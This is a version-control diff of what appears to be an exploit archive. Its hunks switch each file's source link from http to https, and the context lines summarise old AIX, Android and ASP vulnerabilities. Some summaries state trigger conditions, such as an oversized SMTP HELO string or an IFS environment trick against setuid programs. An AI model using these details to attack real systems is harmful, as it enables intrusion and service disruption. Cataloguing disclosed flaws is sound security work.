diff --git a/exploits/aix/dos/19046.txt b/exploits/aix/dos/19046.txt index ece7403f7..ba9ad9606 100644 --- a/exploits/aix/dos/19046.txt +++ b/exploits/aix/dos/19046.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61/info +source: https://www.securityfocus.com/bid/61/info There exists a buffer overflow in the Apple AppleShare IP Mail Server 5.0.3. If yu connect to the SMTP port and issue a HELO command with a large string (500 bytes or more) for a hostname the server, and possibly the whole machine, will crash. diff --git a/exploits/aix/dos/19049.txt b/exploits/aix/dos/19049.txt index 6fcbe7106..9f21c4436 100644 --- a/exploits/aix/dos/19049.txt +++ b/exploits/aix/dos/19049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66/info +source: https://www.securityfocus.com/bid/66/info A vulnerability exists in inetd which allows a remote user to crash inetd if the tcpmux service is not commented out of /etc/inetd.conf. The tcpmux service is defined in RFC1078 diff --git a/exploits/aix/dos/22249.txt b/exploits/aix/dos/22249.txt index da0d0eb00..6f58cb6ef 100644 --- a/exploits/aix/dos/22249.txt +++ b/exploits/aix/dos/22249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6840/info +source: https://www.securityfocus.com/bid/6840/info A buffer overflow vulnerability has been discovered in the libIM library available for the AIX 4.3, 5.1, 5.2 operating system. As a result it may be possible to overwrite sensitive memory in programs linked to the affected library. By identifying a linked application with the setuid bit applied, it may be possible to exploit this vulnerability to execute code with elevated privileges. diff --git a/exploits/aix/dos/25807.txt b/exploits/aix/dos/25807.txt index 226d9f143..e02b6d3b3 100644 --- a/exploits/aix/dos/25807.txt +++ b/exploits/aix/dos/25807.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13909/info +source: https://www.securityfocus.com/bid/13909/info invscout is prone to a local buffer overflow vulnerability. This issue presents itself because the application fails to carry out boundary checks on user-supplied data from the command line. diff --git a/exploits/aix/local/19041.txt b/exploits/aix/local/19041.txt index c527d6c4b..eb33ee49d 100644 --- a/exploits/aix/local/19041.txt +++ b/exploits/aix/local/19041.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17/info +source: https://www.securityfocus.com/bid/17/info By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges. diff --git a/exploits/aix/local/19043.txt b/exploits/aix/local/19043.txt index c9e971481..9b14c1628 100644 --- a/exploits/aix/local/19043.txt +++ b/exploits/aix/local/19043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22/info +source: https://www.securityfocus.com/bid/22/info This applies to sites that have installed Sun Source tapes only. diff --git a/exploits/aix/local/19045.txt b/exploits/aix/local/19045.txt index 816c8051c..c219a610a 100644 --- a/exploits/aix/local/19045.txt +++ b/exploits/aix/local/19045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59/info +source: https://www.securityfocus.com/bid/59/info /etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem. diff --git a/exploits/aix/local/19213.sh b/exploits/aix/local/19213.sh index 771043b3f..d9b362b5a 100755 --- a/exploits/aix/local/19213.sh +++ b/exploits/aix/local/19213.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19214.c b/exploits/aix/local/19214.c index 30cc476bb..1a09f6483 100644 --- a/exploits/aix/local/19214.c +++ b/exploits/aix/local/19214.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +// source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19215.c b/exploits/aix/local/19215.c index 5cab6d212..259349409 100644 --- a/exploits/aix/local/19215.c +++ b/exploits/aix/local/19215.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. */ diff --git a/exploits/aix/local/19216.c b/exploits/aix/local/19216.c index bc66aedbd..50e827ec6 100644 --- a/exploits/aix/local/19216.c +++ b/exploits/aix/local/19216.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/268/info +// source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. diff --git a/exploits/aix/local/19217.c b/exploits/aix/local/19217.c index 5055a831d..b6b9a4ceb 100644 --- a/exploits/aix/local/19217.c +++ b/exploits/aix/local/19217.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/268/info +source: https://www.securityfocus.com/bid/268/info A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges. */ diff --git a/exploits/aix/local/19229.txt b/exploits/aix/local/19229.txt index 81069e150..7abc9e2d7 100644 --- a/exploits/aix/local/19229.txt +++ b/exploits/aix/local/19229.txt @@ -1,4 +1,4 @@ -soure: http://www.securityfocus.com/bid/287/info +soure: https://www.securityfocus.com/bid/287/info IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file. diff --git a/exploits/aix/local/19287.c b/exploits/aix/local/19287.c index 9e334bcd9..14cd401a4 100644 --- a/exploits/aix/local/19287.c +++ b/exploits/aix/local/19287.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/370/info +source: https://www.securityfocus.com/bid/370/info Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under. */ diff --git a/exploits/aix/local/19300.txt b/exploits/aix/local/19300.txt index e3580de0b..fc3838f2a 100644 --- a/exploits/aix/local/19300.txt +++ b/exploits/aix/local/19300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/375/info +source: https://www.securityfocus.com/bid/375/info The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file. diff --git a/exploits/aix/local/19306.c b/exploits/aix/local/19306.c index 04c041277..c14e38e01 100644 --- a/exploits/aix/local/19306.c +++ b/exploits/aix/local/19306.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/385/info +source: https://www.securityfocus.com/bid/385/info AIX version 4.2.1 introduced a new command titled 'portmir'. This new program had two notable vulnerabilites. First it contained a buffer overflow which allowed malicious users to obtain root privileges. Secondly it wrote it's log files to a world readable directly thereby exposing security relavent information. */ diff --git a/exploits/aix/local/19307.c b/exploits/aix/local/19307.c index a09b8e2f7..f3bfb0f18 100644 --- a/exploits/aix/local/19307.c +++ b/exploits/aix/local/19307.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/387/info +// source: https://www.securityfocus.com/bid/387/info A buffer overflow condition exists in some versions of /usr/sbin/ping under AIX. Given that ping is SUID root, this overflow allows malicious users to gain root from it. diff --git a/exploits/aix/local/19309.c b/exploits/aix/local/19309.c index 862436da1..9a7b218d5 100644 --- a/exploits/aix/local/19309.c +++ b/exploits/aix/local/19309.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/389/info +source: https://www.securityfocus.com/bid/389/info A buffer overflow can occur in lchangelv under some versions of AIX. Note that an attacker must already have the GID or EGID of 'system' to execute lchangelv. diff --git a/exploits/aix/local/19318.c b/exploits/aix/local/19318.c index f80175c43..4b3f5bfd7 100644 --- a/exploits/aix/local/19318.c +++ b/exploits/aix/local/19318.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/417/info +// source: https://www.securityfocus.com/bid/417/info A buffer overrun exists in the permissions program, as shipped by Silicon Graphics with the 5.x and 6.x Irix operating system. By supplying a long, well crafted buffer as the 4th argument to the program, arbitrary code can be executed as group sys. diff --git a/exploits/aix/local/19344.sh b/exploits/aix/local/19344.sh index 296946751..1b73b7a84 100755 --- a/exploits/aix/local/19344.sh +++ b/exploits/aix/local/19344.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/454/info +#source: https://www.securityfocus.com/bid/454/info # #Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. # diff --git a/exploits/aix/local/19345.txt b/exploits/aix/local/19345.txt index 18f73926f..7114f978e 100644 --- a/exploits/aix/local/19345.txt +++ b/exploits/aix/local/19345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/455/info +source: https://www.securityfocus.com/bid/455/info There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format. diff --git a/exploits/aix/local/19354.txt b/exploits/aix/local/19354.txt index 3ca96e695..ed576ae8e 100644 --- a/exploits/aix/local/19354.txt +++ b/exploits/aix/local/19354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/468/info +source: https://www.securityfocus.com/bid/468/info The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vulnerability. sgihelp contains an option that allows a user to print to a command. Certain SGI utilities, including PrintStatus, printers, scanners, and a number of others, will call this program without changing their uid to the users, from roots. As such, arbitrary commands can be executed as root using the 'print to command' option of sgihelp. diff --git a/exploits/aix/local/19418.txt b/exploits/aix/local/19418.txt index fd78d5d29..f3eaee5d5 100644 --- a/exploits/aix/local/19418.txt +++ b/exploits/aix/local/19418.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/520/info +source: https://www.securityfocus.com/bid/520/info adb is the debugger that ships with IBM's AIX operating system. It is possible for a local user to cause a local denial of service through exploiting the version of adb shipped with AIX 4.2 through 4.3.1. The consequence of adb being exploited is the machine being halted by a malicious local user. diff --git a/exploits/aix/local/20213.txt b/exploits/aix/local/20213.txt index 115e1b4b0..0e7b9f652 100644 --- a/exploits/aix/local/20213.txt +++ b/exploits/aix/local/20213.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1660/info +source: https://www.securityfocus.com/bid/1660/info A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could potentially interfere with programs that track statistical information. diff --git a/exploits/aix/local/20290.txt b/exploits/aix/local/20290.txt index 8b72c4d02..e794c56d1 100644 --- a/exploits/aix/local/20290.txt +++ b/exploits/aix/local/20290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1800/info +source: https://www.securityfocus.com/bid/1800/info A vulnerability exists in AIX 3.* versions of bugfiler, a utility which automates the process of reporting an filing system bugs. Bugfiler, installed setuid root, creates files in a directory specified by the user invoking the program (example: $/lib/bugfiler -b directory>). It may be possible for an attacker to create files in arbitrary directories that are owned by attacker-specified users. This may result in an elevation of privileges for the attacker. Further technical details about this vulnerability are not known. diff --git a/exploits/aix/local/20452.c b/exploits/aix/local/20452.c index f0313efad..ea65bcdce 100644 --- a/exploits/aix/local/20452.c +++ b/exploits/aix/local/20452.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2032/info +source: https://www.securityfocus.com/bid/2032/info AIX is a version of the UNIX Operating System distributed by IBM. A problem exists that could allow a user elevated priviledges. diff --git a/exploits/aix/local/20453.c b/exploits/aix/local/20453.c index e500ce4d4..5e1cde304 100644 --- a/exploits/aix/local/20453.c +++ b/exploits/aix/local/20453.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2033/info +source: https://www.securityfocus.com/bid/2033/info AIX is a version of the UNIX Operating System distributed by IBM. A vulnerability exists in the operating system which could allow a user an elevation in priviledge. diff --git a/exploits/aix/local/20454.sh b/exploits/aix/local/20454.sh index af36beb50..d748871f6 100755 --- a/exploits/aix/local/20454.sh +++ b/exploits/aix/local/20454.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2034/info +source: https://www.securityfocus.com/bid/2034/info AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges. diff --git a/exploits/aix/local/20455.c b/exploits/aix/local/20455.c index c6ee52f55..474340d38 100644 --- a/exploits/aix/local/20455.c +++ b/exploits/aix/local/20455.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2037/info +source: https://www.securityfocus.com/bid/2037/info AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists which can allow a local user elevated priviledges. diff --git a/exploits/aix/local/20965.sh b/exploits/aix/local/20965.sh index e1bfc39ed..fba31abf7 100755 --- a/exploits/aix/local/20965.sh +++ b/exploits/aix/local/20965.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2916/info +source: https://www.securityfocus.com/bid/2916/info AIX ships with a diagnostic reporting utility called 'diagrpt'. This utility is installed setuid root by default. diff --git a/exploits/aix/local/21094.c b/exploits/aix/local/21094.c index eff650bbe..0a2d0d8d4 100644 --- a/exploits/aix/local/21094.c +++ b/exploits/aix/local/21094.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/3238/info +// source: https://www.securityfocus.com/bid/3238/info // // The 'piomkapqd' utility is a component of the AIX printing subsystem. By default, it is installed setgid and owned by the 'printk' group. // diff --git a/exploits/aix/local/21904.pl b/exploits/aix/local/21904.pl index 79de013b6..856d93cf7 100755 --- a/exploits/aix/local/21904.pl +++ b/exploits/aix/local/21904.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5885/info +source: https://www.securityfocus.com/bid/5885/info The IBM AIX errpt command is prone to a locally exploitable buffer overflow condition. It is possible to exploit this condition to execute arbitrary attacker-supplied instructions with root privileges. diff --git a/exploits/aix/local/22756.pl b/exploits/aix/local/22756.pl index 7bb6373b6..b917b64b6 100755 --- a/exploits/aix/local/22756.pl +++ b/exploits/aix/local/22756.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7871/info +source: https://www.securityfocus.com/bid/7871/info Insufficient bounds checking in the lsmcode utility will allow locally based attackers to cause memory to be corrupted with attacker-supplied data. As a result, it is possible to exploit this condition to execute arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/aix/local/23838.pl b/exploits/aix/local/23838.pl index c7a2c6b6e..5a8d0880a 100755 --- a/exploits/aix/local/23838.pl +++ b/exploits/aix/local/23838.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9903/info +source: https://www.securityfocus.com/bid/9903/info GNU make for IBM AIX has been reported to be prone to a buffer overflow vulnerability, the issue is reported to exist due to a lack of sufficient boundary checks performed when reading the path to the CC compiler. diff --git a/exploits/aix/local/23840.pl b/exploits/aix/local/23840.pl index 387a572f1..1d2ec80d6 100755 --- a/exploits/aix/local/23840.pl +++ b/exploits/aix/local/23840.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9905/info +source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. diff --git a/exploits/aix/local/23841.c b/exploits/aix/local/23841.c index 831a19df5..6b1f42bec 100644 --- a/exploits/aix/local/23841.c +++ b/exploits/aix/local/23841.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9905/info +// source: https://www.securityfocus.com/bid/9905/info getlvcb has been reported to be prone to a buffer overflow vulnerability. diff --git a/exploits/aix/local/23883.pl b/exploits/aix/local/23883.pl index 13ae5cf8b..b3e0ae0f4 100755 --- a/exploits/aix/local/23883.pl +++ b/exploits/aix/local/23883.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9982/info +source: https://www.securityfocus.com/bid/9982/info Reportedly AIX invscoutd insecurely handles temporary files; this may allow a local attacker to destroy data on vulnerable system. This issue is due to a design error that allows a user to specify a log file that the process writes to while holding escalated privileges. diff --git a/exploits/aix/local/25039.txt b/exploits/aix/local/25039.txt index e8547373f..a14b65a41 100644 --- a/exploits/aix/local/25039.txt +++ b/exploits/aix/local/25039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12041/info +source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable. diff --git a/exploits/aix/local/26996.txt b/exploits/aix/local/26996.txt index 04d936212..8f11df067 100644 --- a/exploits/aix/local/26996.txt +++ b/exploits/aix/local/26996.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16102/info +source: https://www.securityfocus.com/bid/16102/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue may let local attackers enumerate the existence of files on the computer that they wouldn't ordinarily be able to see. diff --git a/exploits/aix/local/26997.txt b/exploits/aix/local/26997.txt index c1797417b..63dfbbc06 100644 --- a/exploits/aix/local/26997.txt +++ b/exploits/aix/local/26997.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16103/info +source: https://www.securityfocus.com/bid/16103/info IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulnerability may let the attacker gain unauthorized read access to shell scripts on the computer. diff --git a/exploits/aix/local/30399.c b/exploits/aix/local/30399.c index e7275e2a4..3d7fc645e 100644 --- a/exploits/aix/local/30399.c +++ b/exploits/aix/local/30399.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25075/info +// source: https://www.securityfocus.com/bid/25075/info IBM AIX is prone to a local, stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input to a program that is installed setuid-superuser. diff --git a/exploits/aix/remote/19047.txt b/exploits/aix/remote/19047.txt index 2c210a87d..a6bfc9f6f 100644 --- a/exploits/aix/remote/19047.txt +++ b/exploits/aix/remote/19047.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62/info +source: https://www.securityfocus.com/bid/62/info There exists a buffer overflow in the Stalker Internet Mail Server version 1.6. If you connect to the SMTP port and issue a HELO command with a large string (several hundred bytes) for a hostname the server, and possibly MacOS, will crash. diff --git a/exploits/aix/remote/19048.txt b/exploits/aix/remote/19048.txt index 939a41ae9..47a96aa6b 100644 --- a/exploits/aix/remote/19048.txt +++ b/exploits/aix/remote/19048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64/info +source: https://www.securityfocus.com/bid/64/info There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018. diff --git a/exploits/aix/remote/19237.txt b/exploits/aix/remote/19237.txt index f9eda09f7..ebe14f163 100644 --- a/exploits/aix/remote/19237.txt +++ b/exploits/aix/remote/19237.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/297/info +source: https://www.securityfocus.com/bid/297/info NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsolicited email. Connecting to the mail server (tcp25) and issuing a 'mail from' command with <> as the data will allow an unathorized user to relay email via this server. diff --git a/exploits/aix/remote/19348.txt b/exploits/aix/remote/19348.txt index ad86c8129..a86a27c51 100644 --- a/exploits/aix/remote/19348.txt +++ b/exploits/aix/remote/19348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/458/info +source: https://www.securityfocus.com/bid/458/info A problem with the way login parses arguments as passed by rlogind that may allow access to the root account. diff --git a/exploits/aix/remote/19532.pl b/exploits/aix/remote/19532.pl index bcd7d73a0..5e9aead85 100755 --- a/exploits/aix/remote/19532.pl +++ b/exploits/aix/remote/19532.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/679/info +source: https://www.securityfocus.com/bid/679/info A remote buffer overflow vulnerability in AIX's ftpd allows remote users to obtain root access. diff --git a/exploits/aix/remote/21093.c b/exploits/aix/remote/21093.c index a9305038f..fd6b64f6f 100644 --- a/exploits/aix/remote/21093.c +++ b/exploits/aix/remote/21093.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3237/info +// source: https://www.securityfocus.com/bid/3237/info The Source Code Browser's Program Database Name Server Daemon (pdnsd) component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges on vulnerable systems. diff --git a/exploits/android/dos/31307.py b/exploits/android/dos/31307.py index fa0e4e229..a2144cad6 100755 --- a/exploits/android/dos/31307.py +++ b/exploits/android/dos/31307.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28005/info +source: https://www.securityfocus.com/bid/28005/info Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. diff --git a/exploits/android/dos/31308.html b/exploits/android/dos/31308.html index e39a4db95..3c062888c 100644 --- a/exploits/android/dos/31308.html +++ b/exploits/android/dos/31308.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28006/info +source: https://www.securityfocus.com/bid/28006/info Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data. diff --git a/exploits/android/dos/42135.c b/exploits/android/dos/42135.c index a413b38c5..2ce469a51 100644 --- a/exploits/android/dos/42135.c +++ b/exploits/android/dos/42135.c @@ -1,5 +1,5 @@ -# Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c -# +// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c + #include #include #include diff --git a/exploits/android/local/39061.txt b/exploits/android/local/39061.txt index 5aa21d674..d88314ee8 100644 --- a/exploits/android/local/39061.txt +++ b/exploits/android/local/39061.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65123/info +source: https://www.securityfocus.com/bid/65123/info GoToMeeting for Android is prone to multiple local information-disclosure vulnerabilities. diff --git a/exploits/android/remote/37792.txt b/exploits/android/remote/37792.txt index a95693396..3150114f5 100644 --- a/exploits/android/remote/37792.txt +++ b/exploits/android/remote/37792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37793.txt b/exploits/android/remote/37793.txt index 4f19e5558..b5fca14b6 100644 --- a/exploits/android/remote/37793.txt +++ b/exploits/android/remote/37793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37794.txt b/exploits/android/remote/37794.txt index fee0eeea1..38af91b8f 100644 --- a/exploits/android/remote/37794.txt +++ b/exploits/android/remote/37794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/37795.txt b/exploits/android/remote/37795.txt index 2efb3bf45..765abbe39 100644 --- a/exploits/android/remote/37795.txt +++ b/exploits/android/remote/37795.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55523/info +source: https://www.securityfocus.com/bid/55523/info Google Chrome for Android is prone to multiple vulnerabilities. diff --git a/exploits/android/remote/38170.txt b/exploits/android/remote/38170.txt index 763d1653a..0eb03db25 100644 --- a/exploits/android/remote/38170.txt +++ b/exploits/android/remote/38170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57173/info +source: https://www.securityfocus.com/bid/57173/info Facebook for Android is prone to an information-disclosure vulnerability. diff --git a/exploits/android/remote/38310.c b/exploits/android/remote/38310.c index 611abddc3..c6db1077d 100644 --- a/exploits/android/remote/38310.c +++ b/exploits/android/remote/38310.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57900/info +// source: https://www.securityfocus.com/bid/57900/info The PowerVR SGX driver in Android is prone to an information-disclosure vulnerability. diff --git a/exploits/android/remote/38586.txt b/exploits/android/remote/38586.txt index 58327ea7b..26bb9e36e 100644 --- a/exploits/android/remote/38586.txt +++ b/exploits/android/remote/38586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60566/info +source: https://www.securityfocus.com/bid/60566/info TaxiMonger for Android is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/android/remote/38627.sh b/exploits/android/remote/38627.sh index e8c3606b5..7db2c1863 100755 --- a/exploits/android/remote/38627.sh +++ b/exploits/android/remote/38627.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/60952/info +#source: https://www.securityfocus.com/bid/60952/info # #Google Android is prone to a remote security-bypass vulnerability. # diff --git a/exploits/android/remote/38821.py b/exploits/android/remote/38821.py index 177911f22..a1552f784 100755 --- a/exploits/android/remote/38821.py +++ b/exploits/android/remote/38821.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63547/info +source: https://www.securityfocus.com/bid/63547/info Google Android is prone to a security-bypass vulnerability. diff --git a/exploits/asp/dos/25962.xml b/exploits/asp/dos/25962.xml index db1366944..7e869cffc 100644 --- a/exploits/asp/dos/25962.xml +++ b/exploits/asp/dos/25962.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14217/info +source: https://www.securityfocus.com/bid/14217/info ASP.NET is susceptible to a remote denial of service vulnerability. This issue is due to the possibility of causing an infinite loop on the server when handling RPC/encoded requests. diff --git a/exploits/asp/dos/27258.txt b/exploits/asp/dos/27258.txt index 2a2bd2483..f9f63dd25 100644 --- a/exploits/asp/dos/27258.txt +++ b/exploits/asp/dos/27258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16771/info +source: https://www.securityfocus.com/bid/16771/info Ipswitch WhatsUp Professional 2006 is susceptible to a remote denial-of-service vulnerability. This issue is due to the application's failure to properly handle certain HTTP GET requests. diff --git a/exploits/asp/dos/35154.txt b/exploits/asp/dos/35154.txt index d579dad4a..a29d1ec16 100644 --- a/exploits/asp/dos/35154.txt +++ b/exploits/asp/dos/35154.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45588/info +source: https://www.securityfocus.com/bid/45588/info Sigma Portal is prone to a denial-of-service vulnerability. diff --git a/exploits/asp/remote/27861.txt b/exploits/asp/remote/27861.txt index 4facf9b83..522ac199c 100644 --- a/exploits/asp/remote/27861.txt +++ b/exploits/asp/remote/27861.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17964/info +source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/remote/27862.txt b/exploits/asp/remote/27862.txt index 6d3f88770..111577518 100644 --- a/exploits/asp/remote/27862.txt +++ b/exploits/asp/remote/27862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17964/info +source: https://www.securityfocus.com/bid/17964/info WhatsUp Professional is prone to multiple input-validation vulnerabilities. The issues include remote file-include, information-disclosure, source-code disclosure, cross-site scripting, and input-validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/16178.txt b/exploits/asp/webapps/16178.txt index 0dad792ad..68ed3a20a 100644 --- a/exploits/asp/webapps/16178.txt +++ b/exploits/asp/webapps/16178.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45211/info +source: https://www.securityfocus.com/bid/45211/info Real Estate Single is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/16179.txt b/exploits/asp/webapps/16179.txt index eb0a65239..60ced44de 100644 --- a/exploits/asp/webapps/16179.txt +++ b/exploits/asp/webapps/16179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45212/info +source: https://www.securityfocus.com/bid/45212/info Multi Agent System is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/20987.txt b/exploits/asp/webapps/20987.txt index f2e536642..029600442 100644 --- a/exploits/asp/webapps/20987.txt +++ b/exploits/asp/webapps/20987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2956/info +source: https://www.securityfocus.com/bid/2956/info Citrix Nfuse is an application portal server meant to provide the functionality of any application on the server via a web browser. Nfuse works in conjunction with a previously-installed webserver. diff --git a/exploits/asp/webapps/21308.txt b/exploits/asp/webapps/21308.txt index a9c16e779..0a7bc7a1d 100644 --- a/exploits/asp/webapps/21308.txt +++ b/exploits/asp/webapps/21308.txt 